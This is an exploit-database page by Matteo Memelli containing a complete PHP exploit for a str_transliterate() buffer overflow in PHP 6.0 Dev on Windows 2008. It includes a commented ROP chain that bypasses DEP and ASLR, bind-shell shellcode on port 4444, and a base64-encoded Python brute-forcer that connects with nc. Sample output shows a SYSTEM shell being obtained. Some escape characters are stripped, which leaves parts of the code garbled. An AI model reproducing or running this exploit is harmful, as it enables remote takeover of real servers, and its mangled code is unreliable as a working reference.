PHP 6.0 Dev str_transliterate() Buffer overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass
# Published : 2010-04-13
# Author : Matteo Memelli
# Previous Title : Micropoint Proactive Denfense Mp110013.sys <= 1.3.10123.0 Local Privilege Escalation Exploit
# Next Title : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson 
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

Thx to muts and Elwood for helping ;)

Bruteforce script is attached in base64 format.

root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address...
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:wampbinapacheApache2.2.11>whoami
whoami
nt authoritysystem
*/

error_reporting(0);

$base_s = $_GET['pos_s'];
$base_e = $_GET['pos_e'];
$off_s  = $_GET['off_s'];
$off_e  = $_GET['off_e'];

if(ini_get_bool('unicode.semantics')) {
 $buff    = str_repeat("u4141", 32);
 $tbp     = "u2650u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM 
 $ptw     = "u2FE0u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES
 $ret     = "u2660u6EE5"; // 6EE52660 RET AFTER WPM
 $wpmargs = $ret."uFFFFuFFFF".$tbp."uFFFFuFFFFuFFFFuFFFF".$ptw; // WPM ARGS
 $garbage     = "$wpm = "\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))).
                "\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."";";
 eval($garbage);
 $nops    = str_repeat("u9090", 41);

 // TH || ROP -> Try Harder or Rest On Pain ;)
 // GETTING SHELLCODE ABSOLUTE ADDRESS
 $rop  = "u40ddu6FF2";   // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN             6FF240DD
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP   
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP  
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP  
 $rop .= "u5DD4u6EE6";   // POP ECX/RETN                                         6EE65DD4     
 $rop .= "uFDBCuFFFF";   // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC
 $rop .= "u222Bu6EED";   // ADD EAX,ECX/POP EBX/POP EBP/RETN                     6EED222B   
 $rop .= "u2650u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE) 
 $rop .= "u2650u6EE5";   // JUNK POPPED IN EBP (RET TO SHELLCODE)

 // PATCHING BUFFER ADDY ARG FOR WPM
 $rop .= "u1C13u6EE6";   // ADD DWORD PTR DS:[EAX],EAX/RETN                      6EE61C13

 // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE)
 $rop .= "uE94Eu6EE6";   // MOV EDX,ECX/POP EBP/RETN                             6EE6E94E   
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u5DD4u6EE6";   // POP ECX/RETN                                         6EE65DD4
 $rop .= "uFF5CuFFFF";   // VALUE TO BE POPPED IN ECX                            FFFFFF5C
 $rop .= "uE94Cu6EE6";   // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN                 6EE6E94C
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP

 // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM
 $rop .= "u0C54u6EE7";   // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN            6EE70C54
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP    

 // REALIGNING ESP TO WPM AND RETURNING TO IT
 $rop .= "u8640u6EE6";   // ADD EAX,-30/POP EBP/RETN                             6EE68640
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u29F1u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u29F1u6EE6";   // ADD EAX,0C/POP EBP/RETN                              6EE629F1
 $rop .= "u4242u4242";   // JUNK POPPED IN EBP
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u10ADu6FC3";   // INC EAX/RETN                                         6FC310AD
 $rop .= "u2C63u6FC5";   // XCHG EAX,ESP/RETN                                    6FC52C63

           
  
 // unicode bind shellcode port 4444, 318 bytes
 $sh = "u6afcu4debuf9e8uffffu60ffu6c8bu2424u458bu8b3cu057cu0178u8befu184fu5f8b".
       "u0120u49ebu348bu018bu31eeu99c0u84acu74c0uc107u0dcauc201uf4ebu543bu2824".
       "ue575u5f8bu0124u66ebu0c8bu8b4bu1c5fueb01u2c03u898bu246cu611cu31c3u64db".
       "u438bu8b30u0c40u708buad1cu408bu5e08u8e68u0e4eu50ecud6ffu5366u6866u3233".
       "u7768u3273u545fud0ffucb68ufcedu503bud6ffu895fu66e5ued81u0208u6a55uff02".
       "u68d0u09d9uadf5uff57u53d6u5353u5353u5343u5343ud0ffu6866u5c11u5366ue189".
       "u6895u1aa4uc770uff57u6ad6u5110uff55u68d0uada4ue92euff57u53d6uff55u68d0".
       "u49e5u4986uff57u50d6u5454uff55u93d0ue768uc679u5779ud6ffuff55u66d0u646a".
       "u6866u6d63ue589u506au2959u89ccu6ae7u8944u31e2uf3c0ufeaau2d42u42feu932c".
       "u7a8duab38uababu7268ub3feuff16u4475ud6ffu575bu5152u5151u016au5151u5155".
       "ud0ffuad68u05d9u53ceud6ffuff6au37ffud0ffu578bu83fcu64c4ud6ffuff52u68d0".
       "uceefu60e0uff53uffd6ud0d0u4142u4344u4142u4344u4142u4344u4142u4344";

 $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop;
 str_transliterate(0, $exploit, 0);
} else {
 exit("Error! 'unicode.semantics' has be on!rn");
}

function ini_get_bool($a) {
 $b = ini_get($a);
 switch (strtolower($b)) {
  case 'on':
  case 'yes':
  case 'true':
   return 'assert.active' !== $a;
  case 'stdout':
  case 'stderr':
   return 'display_errors' === $a;
  default:
   return (bool) (int) $b;
 }
}

/*
IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt
cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91
dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg
ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g
c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw
YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw
LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6
IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp
biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp
CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh
cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp
Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms
IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k
Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu
dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy
aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9
PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg
fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ
cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y
ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy
ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg
ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg
Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt
ZS5zbGVlcCgwLjA1KSAK
*/
?>